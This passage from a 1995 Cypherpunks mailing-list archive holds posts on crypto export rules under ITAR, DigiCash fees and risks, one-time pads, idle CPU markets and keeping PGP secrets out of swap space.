>  The ITARs are currently keeping us(Netscape) from distributing
>our US-only products to people within the United States.  We have
>asked for clarification from the government about network distribution,
>such as how much verification of location and citizenship of the
>recipient we must do, and have yet to receive a response.  That
>makes it more than just an export issue, at least for us.

And I agree that this is a much more important issue than whether a t-shirt
can get an OK for export or not.

If the CJR for the t-shirt is ultimately granted, what useful information
will be derived, or what implications for Netscape's question will be
discovered?

If the CJR for the t-shirt is ultimately denied, ditto?

Distribution over networks--which is happening every day, and which is
happening every time the Cypherpunks list contains code fragments and other
useful comments on crypto tools--is a much more serious issue.

The t-shirt joke is unlikely to help. (For all those who commented that
wearing the munitions shirt is rilly, rilly kool, I say "Great!" Wear it in
the mosh pits, just lie to people about how the t-shirt "has been
classified as a munition." It hasn't been as of this writing.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 27 Oct 1995 11:34:42 +0800
To: cypherpunks@toad.com
Subject: Re: [Noise] Perrynoia in the Comics
Message-ID: <acb5785f0a02100419f3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:05 PM 10/26/95, Alan Olsen wrote:
>At 08:13 AM 10/26/95 -0400, you wrote:
>>
>>Alan Olsen writes:
>>> This has no real crypto relevence, but some anarchistic relevence.
>>
>>Alan;
>>
>>As much as I found the comment interesting, it probably belonged
>>somewhere like libernet-d, not here on cypherpunks.
>
>I posted it on Cypherpunks becuase it is the only list I take where such
>political views are even mentioned.  I thought that people on the list would
>enjoy it.  I prefaced it with [noise[] so that people who would object would
>skip over it.  Evidently that disclaimer is not enough anymore.


I found Alan's comment about the comics interesting, as even Alan's critic
apparently did, and hardly harmful to the overall noise level. It gave in a
short snapshot a vignette of "pop culture" views of surveillance.

At less than 1% of the size of the latest EPIC crosspost to our list (or
was it EFF, or VTW?) it hardly will affect the list in any significant way.

Many of us have posted movie reviews, book reviews, even mentions of Alison
Armitage sightings. The list is more than just about Java and Netscape,
though newcomers may not know this.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 27 Oct 1995 13:59:05 +0800
To: cypherpunks@toad.com
Subject: RE: Let's Not Merge Mailing Lists, OK?
Message-ID: <acb579ae0b02100468ae@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:11 PM 10/26/95, Ali Bahreman wrote:

>Being subscribed to cypherpunks is not a prerequisite for following the list;
>thanks to its hypermail archive and numerous filters.

No,. of course it isn't.

But copying the  www-buyinfo@allegra.att.com mailiing list on a post, as
you and some others did, is much more than following the list with
hypermail and other such tools: it is actively posting to two mailing
lists.

Sometimes this is OK, but often it results in two lists only marginally
educated in the issues of the other list.

I replied at more length to Ali in private, but will say here that anyone
is welcome to join the Cypherpunks list and to read up on the FAQs and
archives of past discussions.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Fri, 27 Oct 1995 10:57:50 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: newsweek oct 30 Levy digital cash article
In-Reply-To: <199510262050.NAA00978@netcom23.netcom.com>
Message-ID: <Pine.SOL.3.91.951026180246.16411E-100000@echonyc>
MIME-Version: 1.0
Content-Type: text/plain


>also, my question about whether one loses the downloaded Chaumian bucks
if one's hard drive crashes was answered in the affirmative by Levy.

But as I said, if the drive is backed up you don't lose it. It's my 
understanding this is the case with the current Digicash/Twain bucks.  
But not necessarily with all implementations.

This "lose your money" with digital cash really does seem to get to 
people. I always point out that when you take $ out of an ATM machine, 
you don't expect to get it back if you lose it.  For those forms of 
e-money that are irretrevable when lost users are warned not to download 
huge amounts. 

Question: will people's worries about losing their e-money lead them to 
accept a higher degree of tracibility as a tradeoff?  

Steven




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 27 Oct 1995 10:44:45 +0800
To: Cypherpunks <jsw@netscape.com>
Subject: Re: CJR returned to sender
In-Reply-To: <308FBACB.581A@netscape.com>
Message-ID: <m0t8aTG-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:

:   The ITARs are currently keeping us(Netscape) from distributing
: our US-only products to people within the United States.  We have
: asked for clarification from the government about network distribution,
: such as how much verification of location and citizenship of the
: recipient we must do, and have yet to receive a response.  That
: makes it more than just an export issue, at least for us.
: 
: 	--Jeff
: 
: -- 
: Jeff Weinstein - Electronic Munitions Specialist
: Netscape Communication Corporation
: jsw@netscape.com - http://home.netscape.com/people/jsw
: Any opinions expressed above are mine.

Don't hold your breath.  I just had a chat with the NSA person at the
Office of Defense Trade Controls who is supposed to answer all
questions about the export of cryptography and she took the position
that whether posting materials on a server is an export ``is an
interesting question.''  I specifically asked her if her office had
come up with the rigamarole that some servers use to make sure you are
a citizen and then give you an address that expires faster than I can
type where one can get the cryptographic software.  She denied that
that rigamarole was invented or approved by her office; and said that
it was an interesting question, not only for cryptography, whether a
server on the internet was a ``point of export.''  She told me that as
a law professor I would be interested in that question.  (I think that
the implication was that someone really in business would be terribly
frustrated.)

Of course, this is just my impression of a conversation that was not
really directed to any specific issues.  She did tell me thoughh that
since cryptographic software does the same thing as cryptographic
hardware, such software was treated as hardware.  I asked where the
regulations said that, and she never was able to give me a direct
citation to anything in the regs.

I am sorry to be the bearer of bad news.

Ciao,
Peter
--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Fri, 27 Oct 1995 15:48:21 +0800
To: cypherpunks@toad.com
Subject: Mail to News gateways
Message-ID: <199510270018.SAA00625@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am compiling a quick list (for my own use, mostly) of mail 2 news
gateways to link to from my homepage. (As opposed to, for example,
posting it to Usenet or something)

A while back there was Yet-Another-Rehash[tm] of this theme and I
saved the messages: Homer's lightlink.com and Alex de Joode's
mail2news@utopia.hacktic.nl.

mail2news@c2.org used to be alive, but either wasn't getting the
groups I was posting to or it was shut down. (Sameer: email me please
about this)
 
Anyway, if anyone knows of anything else please tell me.
Oh, and the URL is http://students.cs.byu.edu/~don/mail2news.html

Thanks.
 
Don

Oh, by the way, anyone have any cool PGP/crypto icons to Inline into
my web page? <g>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 27 Oct 1995 11:39:15 +0800
To: cypherpunks@toad.com
Subject: Re: newsweek oct 30 Levy digital cash article
Message-ID: <v02120d12acb5f44790cc@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



[stuff about losing e-cash]

They already point out that you shouldn't hoard money on
your own machine.

I've been doing what I can to pitch in and help out, including
some suggested edits to their materials. Here's my suggested
rewording of that section:

=========
Ecash that you keep on the hard drive is like cash. It can be erased
accidentally in the event of a hard drive crash or other system problem.
While we do have safeguards against this, there is a possibility you
could lose money if your ecash files are lost.

Money in the Ecash Mint is also like cash. Although the Mint is well-
secured and maintained by computer professionals, it is a new,
somewhat experimental system. Also, it is connected to the Internet.
While we have taken many steps to ensure the Mint's security, we cannot
at this time make the same guarrantees we'd make for a regular bank
account.

Because of these factors, we strongly urge you to keep your balances in
the Mint and on your hard drive fairly low. A good rule of thumb is
to have no more money on your personal computer than you'd be comfortable
carrying in your wallet in a typical American city. Don't leave more
money in the Mint than you'd be comfortable leaving stashed in a drawer
in your house.
================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 27 Oct 1995 11:40:07 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: idle CPU markets
Message-ID: <Pine.SUN.3.91.951026184046.23045A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


With many high speed personal computers on the Internet and the 
deployment of low transaction cost Internet payment schemes, it seems 
inevitable that markets for idle CPU cycles and memory will develop.  An 
interesting problem is to try to predict who this market will benefit, 
and what the market will be used for.

So far it seems that cryptanalytic problems (e.g. factoring and brute 
forcing of keys) have the highest marginal value/MIPS among problems 
amenable to loosely coupled distributed computation.  However, I think it 
would be wasteful if the demand in idle CPU and memory markets were to be 
dominated by cryptanalysts since (non-academic) cryptanalysis is basicly 
a zero-sum game.  When a key is broken, no wealth is created, rather it 
is transfered from the owner of the key to the cryptanalyst.  

What other problems would benefit from easy access to lots of distributed 
CPU cycles?

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 27 Oct 1995 11:29:19 +0800
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Subject: Re: rejection of CJR
In-Reply-To: <m0t8Tqi-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199510262313.TAA01043@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 

> Request for the T-Shirt had been returned and read him the message to
> that effect.
> 
> [Mr. Capilino] told me that that was the wrong address for mail, since
> it was used only for currier deliveries, and that they have stopped
> accepting even currier deliveries there since the Oklahoma city bombing.

try:

Office of Defense Trade Controls 
PM/DTC
Department of State
Washington DC 20522-0602

This goes to via the mail facility at Dulles where they DO
screen mail....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 27 Oct 1995 11:43:24 +0800
To: gnu@toad.com
Subject: Re: Mark Twain Bank's DigiCash offer
In-Reply-To: <199510262212.PAA19056@comsec.com>
Message-ID: <9510270219.AA29315@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The two big drawbacks for me in this offer are:

	*  The contract gives them the right to demand that I pay for
	   anything that they spend investigating their "rights,
	   remedies, and security interests".  Not if I sue them.  Not
	   if they win.  ANYTIME.  I could send them email, and get
	   back a bill for the employee time spent answering it.  And
	   I've agreed to pay such bills, if I sign their contract.

> 13. Costs, Expenses and Interest. Customer, on demand from Bank, shall pay
> to Bank all costs and expenses incurred or paid by Bank for any reason in
> connection with this Agreement and relating to protecting, enforcing and
> determining Bank's rights, remedies and security interests, including but
> not limited to, attorneys' fees and costs . . .

	* You pay 4% -- in the BEST deal -- on every transaction.  The
	   high-initial-fee merchant account still charges you 2% on
	   the way in, and 2% on the way out.  You don't even have to
	   spend any of it, you pay for just moving money among your
	   accounts.  If both payer and payee are using one of the
	   low-initial-fee accounts, the total loss could be as much as
	   10%.

There's lots of little drawbacks too.
I sure hope the competition arrives soon.

	John






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Darren New <dnew@sgf.fv.com>
Date: Fri, 27 Oct 1995 11:24:51 +0800
To: Nick Szabo <szabo@netcom.com>
Subject: Re: DigiCash
In-Reply-To: <199510260038.RAA21478@netcom.netcom.com>
Message-ID: <Pine.3.89.9510261924.B613-0100000@sgf.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


> Darren New:
> > If I give you a dollar for an online newspaper and the 
> > newspaper never gets to me, or I give you $50 for a textbook and the 
> > textbook never shows up in the mail weeks later, who do I go to to get my 
> > money back?
> 
> This is a bad-case scenario, since it involves long delay and
> delivery of goods that, unlike information, have a nontrivial
> marginal cost to the merchant. 

Well, the online newspaper is certainly information. 

> * Escrow services, which take responsibility for delivery each
> way (and develop a public reputation for reliably doing this).
> This has the value that it still allows the parties to be mutually
> anonymous (although additional tools are needed to actually
> have strongly anonymous connections, the payment/delivery protocol 
> doesn't preclude it).

If you can do this, then you don't need an anonymous payment system, do
you? If you want to go through a trusted third-party escrow agent and
that agent doesn't know what you're buying, why do you need to hide what
you're spending it on? How is this different from the bank being the 
trusted third party holding your money in escrow anonymously?

If the escrow agent knows who you're buying from and who you're selling
to, you've lost the anonymity. If the escrow agent doesn't know what the 
goods are and doesn't know who is exchanging the goods, then you don't 
need to pay that agent anonymously.

> * Ripped bill protocols might be able to substitute for escrows.
> (these are quite esoteric, but can again be hidden behind a nice
> metaphor).

I still think that at some point, either you have the money before the 
goods or the goods before the money. Basic Byzantine General problem, yes?
In addition, if it's online cash, I have to clear it with the bank before 
I know it's any good. I read the Certified Electronic Mail paper, and 
(while I didn't follow it all) I didn't see how that solved the problem.

> * Deal only with a jurisdictionally reachable merchant and hope the
> law is on your side

And... how do you know? How do you know that the LLBean website that's 
taking your money *is* LLBean?  (Probably TM's in there somewhere.)
I can set up a web site, run it for three days, and walk off with a bunch 
of money, can't I? How can someone distinguish this from LLBean having 
shipping delays?

> (often not an available solution on the global 
> Internet, but usually assumed by identified payment schemes, so
> it's a reasonable fallback from that point of view).

First Virtual assumes that the seller loses in the case of a dispute. 
Bearer instruments assume that the buyer loses in the case of a dispute. 

> For smaller transactions with rapid delivery times, complaining 
> loudly and publicly on Usenet will soon put the business out of it.

That's assuming the business meant to stay in business in the first place.
Ever hear the one where you wheel the fake ATM machine into the mall for
one day? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 27 Oct 1995 11:47:11 +0800
To: cypherpunks@toad.com
Subject: Re: Mark Twain Bank's DigiCash offer
In-Reply-To: <9510270219.AA29315@toad.com>
Message-ID: <199510270259.TAA03688@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


John Gilmore <gnu@toad.com> writes:
>	* You pay 4% -- in the BEST deal -- on every transaction.  The
>	   high-initial-fee merchant account still charges you 2% on
>	   the way in, and 2% on the way out.  You don't even have to
>	   spend any of it, you pay for just moving money among your
>	   accounts.  If both payer and payee are using one of the
>	   low-initial-fee accounts, the total loss could be as much as
>	   10%.

As far as I can tell there is no charge for moving funds between your
ecash wallet and the "mint" at the bank.  The charges are for moving
between the "mint" and the world access account.  If you had a shop
which was able to pay much of its expenditures in ecash it sounds like
there would be no percentage fee to the bank.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 27 Oct 1995 12:07:55 +0800
To: corby@pela.intuit.com (Corby Anderson)
Subject: Re: One Time Pad encryption over the Internet, securely? (fwd)
In-Reply-To: <9510262248.AA19876@doom>
Message-ID: <9510270345.AA21918@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain


Corby,

> I *had* to forward this to you.  Can you give him the answer, or are you
> bound by an NDA?  I can't remember.
> 
> Corby

Unfortunately, I am bound by an NDA.

However, I am not violating the NDA by saying that Craig is correct.
There is no way to do a one-time pad except by doing a one-time pad.
In other words, it is not possible to generate synchronized, truly
random key streams at remote locations non-algorithmically.

One-time pads have a property that no other encryption scheme has.  If
I am an attacker and I somehow gain access to all of the key material
and all of the plaintext that two communicating parties have so far
used, I am still unable to decipher the next transmission.  *Only*
one-time pads have this property, and there is no way to achieve it
without negotiating a key stream out of band.

OTPs also have some other properties that are more mathematical in
nature.  For instance, the probability of getting any particular bit
of plaintext from a given ciphertext is equal to the raw probability
of getting that plaintext by itself.  In other words:

   p_P(x_i | c) = p_P(x_i)

where P is the plaintext space, x_i is the plaintext, and c is the
ciphertext.

Furthermore,

   p_K(K) = 1/|K|

which means that all keys are used with equal probability,
irrespective of plaintext and ciphertext.

Hope this helps!

   - Mark -

> Forwarded message:
> > From firewalls-owner@GreatCircle.COM Thu Oct 26 03:39:33 1995
> > X-Delivered: at request of corby on doom
> > X-Authentication-Warning: miles.greatcircle.com: majordom set sender to firewalls-owner using -f
> > From: Craig Bishop <csb@connect.com.au>
> > Message-Id: <199510260745.RAA16385@koromiko.off.connect.com.au>
> > Subject: One Time Pad encryption over the Internet, securely?
> > To: firewalls@greatcircle.com
> > Date: Thu, 26 Oct 1995 17:45:13 +1000 (EST)
> > X-Mailer: ELM [version 2.4 PL21]
> > Mime-Version: 1.0
> > Content-Type: text/plain; charset=US-ASCII
> > Content-Transfer-Encoding: 7bit
> > Sender: firewalls-owner@GreatCircle.COM
> > Precedence: bulk
> > 
> > I was contacted and asked whether I was interested in software which
> > which used a one time pad for encrytion.
> > 
> > It comes from Elementrix an Isreali company is offering encrypted email,
> > ftp and what they call "personal firewall" software.
> > 
> > This software uses a One Time Pad via a patent pending method. I am no
> > encryption expert and the information available is limited but it would
> > seem to me that there is no way to do this over the internet securely.
> > 
> > See, http://www.elementrix.co.il/
> > 
> > Cheers, Craig
> > 
> > -- 
> > Craig Bishop - Internet Security Analyst
> > csb@connect.com.au
> > http://www.connect.com.au/people/csb/
> > 
> 



--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 27 Oct 1995 11:57:17 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: idle CPU markets
In-Reply-To: <Pine.SUN.3.91.951026184046.23045A-100000@eskimo.com>
Message-ID: <199510270342.VAA13430@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "Wei Dai <weidai@eskimo.com>" allegedly wrote:
>
> What other problems would benefit from easy access to lots of distributed 
> CPU cycles?


Well there are plenty of applications that want lots of cycles, but
there are several problems with the idle CPU market approach to getting
those cycles.



(Examples I can think of:  rendering of movie-quality graphics in
non-real-time, scientific computation/modelling, compiling...)


1.  Many such applications want their computation to be highly 
responsive--  the long turn-around involved in farming your task 
over a WAN is often prohibitive.  (E.g. real-time graphics.)

2.  Also many applications that need this kind of power are highly 
sensitive to inaccuracy or fraud.  A scientific modelling experiment 
which uses zillions of cycles can be rendered completely worthless 
if a tiny calculation that had been farmed to Joe Blow is done wrong 
or is lied about by Joe.

3.  Similarly, many such applications are highly confidential.


I'm sure some cypherpunks have good ideas on how to deal with
problems 3 and maybe 2...



Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMJBVJvWZSllhfG25AQG5DgP/SL0fcuwTtc140OANZpZZ0jIfiXzyE7/v
0P+vOU1o2sgloAge8drPAo6O3/x92sU1YJFN4QxFLLIpD84vxTjS1XwFAywZqQQu
sn8HcNyTVRyUwjgVm3zd4adyQVBorYNpnreDqAnNPMaB9fDHrWMy+09hFx9JV+/X
nL15ZctEHTI=
=vI1Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 27 Oct 1995 12:10:59 +0800
To: don@cs.byu.edu
Subject: The Unofficial "PGP" Icon / Logo
In-Reply-To: <199510270018.SAA00625@wero.byu.edu>
Message-ID: <199510270353.VAA13851@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 don@cs.byu.edu allegedly wrote:
>
> Oh, by the way, anyone have any cool PGP/crypto icons to Inline into
> my web page? <g>


A few months ago I decided that what the world needed was a friendly-
looking "PGP" icon which we could all display everywhere and which 
would catch people's attention.  I quickly rejected pictures of locks,
chains, safes, keys and so forth as appealing too much to those who
go for tech and tools.  I wanted something that would appeal to my
mom.  I finally settled on a big-pixel ("digital") blue envelope 
with a big "PGP" stamp across the seal.  (Alternately I considered
having the "PGP" stamp in the upper-right-hand-corner "stamp slot",
but this wasn't as fitting a metaphor...)


After shopping around and finding nothing like it available, I sat
down at some stupid Windoze paint program and created one.  It's not
very pretty (I'm a better programmer than graphic artist, I think),
but you can see it/get a copy at 
<a href="http://www-ugrad.cs.colorado.edu/~wilcoxb> The Niche </a>, 
my home page.


I hope someone makes a nicer-looking version soon so I can use it.


Sitting down and trying to draw a nicer-looking PGP icon is on my
(very long) list of Things To Do.  I'm considering scanning a real
envelope and super-imposing the "PGP" stamp digitally, but that
would probably look even uglier...


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMJBXkfWZSllhfG25AQGebgQAnR7aLOMKYLE6AuJBL46zGkkTrBEpkWhb
hl5uGxctL6NoYL/sGjsPbdU8XrF4sjN7grlh456P9ol2NkUNoHqRfKl53gIpmJBO
N+DA8LktH2V0n+81LfyKx6L2i25tKa/re8gKFSDUZXpMrrfFRt6FQpGvvDtKuPUN
D2G2WAGKTLM=
=4zWl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Oct 1995 12:44:45 +0800
To: cypherpunks@toad.com
Subject: PIS_tst
Message-ID: <199510270218.WAA25945@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-26-95. Wash Rag:


   "CIA & The Justice Dept. Ground Rules for Disputed
   Territory."

      Officials told the Senate Select Committee on
      Intelligence that the Clinton administration has made
      improving cooperation between the CIA and the Justice
      Department a priority, so they can routinely exchange
      sensitive information on a growing list of topics that
      embrace both domestic and international activities --
      such as terrorism, organized crime, narcotics, alien
      smuggling and arms proliferation.


   PIS_tst  (6 kb)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Oct 1995 12:44:42 +0800
To: cypherpunks@toad.com
Subject: COS_sec
Message-ID: <199510270219.WAA26087@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-23-95. NYPaper:

   "An operating system to keep the wide spaces open while
   providing security. Providing tools to build hangouts in
   cyberspace, protected by encryption." Denise Caruso's
   column.

      Electric Communities began work began in 1993 on the
      Cyberspace Operating System, or COS, designed to manage
      the resources of shared computing -- like security and
      bandwidth -- just as operating systems like the
      Macintosh OS or Windows 95 manage resources inside a
      desktop PC. The team is inventing some technology,
      including a programming language (compatible with Sun
      Microsystems' new Java language for Internet
      applications) and a design concept for software building
      blocks which it is in the process of patenting. In
      addition, staff cryptographers are weaving encryption
      throughout the system to make it absolutely secure and
      private.


   COS_sec  (6 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Oct 1995 12:45:26 +0800
To: cypherpunks@toad.com
Subject: SPI_bux
Message-ID: <199510270220.WAA26233@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-22-95, NYPaper:

   "When Spies Look Out For the Almighty Buck."

      "The fact of the matter is that the intelligence
      agencies are the center where all this is put together
      -- the economic, the political and the security
      concerns," said Robert B. Zoellick, a former top State
      Department official who handled much of the economic
      portfolio in the Bush Administration. "And perhaps that
      makes sense, because they should have more detachment
      than the individual economic agencies would."


   "Economic Espionage." Editorial

      The C.I.A. has not made a convincing case why it should
      start from almost no base to build a center for economic
      intelligence and analysis when the Government can hire
      outside experts or look to agencies like the Treasury
      Department that already have more knowledgeable staffs.
      William Casey had many faults as Director of Central
      Intelligence in the Reagan Administration. But he did
      know a thing or two about economics. Whenever he wanted
      economic intelligence, Mr. Casey often said, he would
      ask a businessman, not an intelligence analyst.


   SPI_bux  (14 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Oct 1995 13:45:01 +0800
To: cypherpunks@toad.com
Subject: CAS_bah
Message-ID: <199510270221.WAA26405@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-22-95. NYPaper: 

   "High Stakes, High Tech. Imagine the Internet As Electronic
   Casino."

      Mr. Fields is the former director of Darpa. He now hopes
      to transform the Internet, developed to defeat the
      evil empire, into a powerful medium for indulging
      America's growing weakness for wagering, to bring
      casinos to the people -- and into the center of American
      life, the home.

      "When I was looking around for what I would do next I
      decided to do something in the entertainment and gaming
      industries because they're now the greatest users of
      advanced technologies," Mr. Fields said. "It used to be
      the defense industry."


   CAS_bah  (6 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Fri, 27 Oct 1995 15:30:59 +0800
To: cypherpunks@toad.com
Subject: pub key expert wanted
Message-ID: <rschlafly3000548130>
MIME-Version: 1.0
Content-Type: text/plain



Re: Schlafly v. Public Key Partners & RSA Data Security

I am deposing the inventors, but there are apt to be some loose
ends that I will need to tie down and I may need some expert
testimony.  I'd like to have someone

* with expertise in public key crypto
* with some impressive-sounding credentials
* willing to volunteer to help break some patents

Any suggestions?

Roger Schlafly
rschlafly@attmail.com
phone: 408-476-3550




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Fri, 27 Oct 1995 14:12:41 +0800
To: Wei Dai <cypherpunks@toad.com>
Subject: Re: idle CPU markets
Message-ID: <v03003801acb61db18d2a@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:45 26.10.95, Wei Dai wrote:

> What other problems would benefit from easy access to lots of
> distributed  CPU cycles?

It would be within the capability of smaller animation houses to render
a feature length computer-animated film at high quality without
significant capital equipment expenditure or excessive rental costs.

If the granularity of transaction is per-frame (not unreasonable for a
night's worth of cycles), the evil participant problem is avoidable
since each frame would have to be inspected by a person, and payment
for a correct frame approved by same, before it's integrated into the
film.

_______________________________________________________________________
Stephan Somogyi               Senior Editor               Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 27 Oct 1995 15:28:51 +0800
To: cypherpunks@toad.com
Subject: Re: Linux security issues
Message-ID: <199510270552.WAA17904@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:23 10/26/95 -0500, Aleph One wrote:
>         I dont see what this has to do with Linux. The question should
>be does the PGP pass phrase ever apper in a swap partition/file.

Actually keeping the pass phrase out of swap space is fairly easy (although
I havn't looked at the PGP code to see if it actually does this).  Read the
pass phrase in raw mode, one character at a time and convert it one
character at a time to the decryption key for the private RSA key.  Then
the OS doesn't need to buffer the whole line, either in kernel space or in
user space.

However, the pass phrase is not the only dangerous information. 
Intermediate forms used for decrypting the RSA private keys, and the
decrypted RSA private keys also have to be protected.  The logic of PGP
requires that it keep at least one of these around for a long time, so it
will probably be written to swap space.

N.B. This problem affects all virtual memory operation systems.  I can
think of the Unix/Linux family, MacOS with virtual memory turned on, and
most mainframe OSs (e.g. IBM's VM/ESA).


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 27 Oct 1995 11:33:34 +0800
To: Richard.Johnson@Colorado.EDU (Richard Johnson)
Subject: Re: HTTP Request-Header & Server Environment Echoes
In-Reply-To: <v02130500acb55ea73e82@[204.131.233.57]>
Message-ID: <9510262211.AA09165@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


you can add
http://hplyot.obspm.fr:6661/
and
http://hplyot.obspm.fr:8001/

which both shows the raw stuff read from yout browser
(the first is my anonymous proxy, the later is an experimental
dynamic server)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

[Hello to all my fans in domestic surveillance] Kaser Sose terrorist
 radar $400 million in gold Greenpeace genetic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 27 Oct 1995 12:11:24 +0800
To: Mark <mark@lochard.com.au>
Subject: Re: Mandatory ID in California?
In-Reply-To: <199510260643.AA26567@junkers.lochard.com.au>
